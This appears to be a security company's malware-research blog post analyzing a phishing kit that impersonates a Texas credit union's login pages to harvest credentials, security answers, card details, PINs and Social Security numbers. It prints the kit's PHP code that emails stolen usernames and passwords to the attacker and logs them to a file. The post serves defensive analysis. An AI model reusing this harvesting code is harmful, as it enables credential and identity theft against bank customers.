Multi-Step Phishing Kit Targeting Credit Union

  • April 1, 2020
Multi-Step Phishing Kit

Phishing attacks can come in all shapes and sizes. Posing a serious threat to industries large and small, phishing campaigns are the fraudulent attempt to obtain sensitive personal information or login details to gain unauthorized access to accounts to make fraudulent purchases.

These malicious attempts to lure victims are often done by masquerading as a trustworthy entity such as a bank, electronic communicator, internet provider, or retail company. This often involves a third party compromised website with an uploaded phishing kit. The attacker uses a separate service to send out emails containing links to the phishing pages which have been setup on the compromised website.

During a recent malware investigation, we came across a phishing page targeting the customers of Randolph-Brooks Federal Credit Union (RBFCU), a large financial institution located in Texas with over 850,000 members.

Multi-stage Phishing Kit Interface

Here’s the initial phishing page compared to the legitimate login interface for the RBFCU credit union. Can you spot the difference?

These pages are nearly identical, making it especially difficult for victims to detect malicious behavior at first glance. One key flag is the top-level domain, which typically belongs to a compromised website instead of the legitimate rbfcu.org URL.

The phishing campaign follows a typical workflow, with the objective of obtaining sensitive user information. A malicious script grabs the usual data from the victim, including email address, username, passwords, user-agent, IP address, and secret questions for account recovery.

Phishing Page Interface

Let’s dig a bit further to see what this multi-stage phishing kit includes.

The initial login page (login.php) of the phishing kit was found within the ./thre/rdfc/ directory of a compromised WordPress site. This page is used to collect the victim’s username and password, which is sent to the attacker in a POST request when the user clicks the Sign In button.

The user is then navigated to the second page, which is used to harvest security identification information from the victim (seen below).

Security question verification step

Once completed, the user is navigated to a third verification page that is almost identical to the first step, but this one is slightly different. Instead of a username, it requests the user’s personal email address and password.

Identity verification step 1

Once completed, the user is directed to a final identity verification page that requests an enormous amount of personally identifiable information, including debit card number, expiration dates, ATM PIN, account number, and social security number.

Identity verification step 2

As soon as the user submits their personal details on this final page, the malicious script redirects them to a splash thank you page which, after a five-second delay, redirects the victim to the legitimate RBFCU site.

rbcfu redirection script

One clear red flag is the amount of information being requested on login. Most users should be aware that entering personal information including social security numbers isn’t a typical requirement for accessing their credit union account. Attackers are clearly banking on the fact victims aren’t aware of personal security best practices, hoping to leverage less-educated individuals.

Data Transfer

The data is passed along in an email to the phisher using a POST request in multiple batches. The malicious script collects the data in a .txt file, which is very common in these types of campaigns.

$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$message .= "--------------rbfcu Info-----------------------\n";
$message .= "|user : ".$_POST['r90B78929']."\n";
$message .= "|pass: ".$_POST['RP300WO']."\n";

$message .= "|--------------- DC -------------------|\n";
$message .= "|Client IP: ".$ip."\n";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
$message .= "User Agent : ".$useragent."\n";
$message .= "|----------- DC --------------|\n";
include 'emfill.php';
$subject = "rbfcu| ".$ip."\n";
mail(','.$form,$subject,$message);
    $text = fopen('sgh.txt', 'a');
fwrite($text, $message);
mail($to,$subject,$message);

Conclusion & Mitigation

This campaign clearly illustrates that bad actors can target any financial institution — even ones that are regional.

Since most phishing pages tend to be hosted on compromised websites, site owners can protect themselves by using monitoring services and integrity controls to detect indicators of compromise.

If you think your website has been hacked and is hosting malicious content, we can help.

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like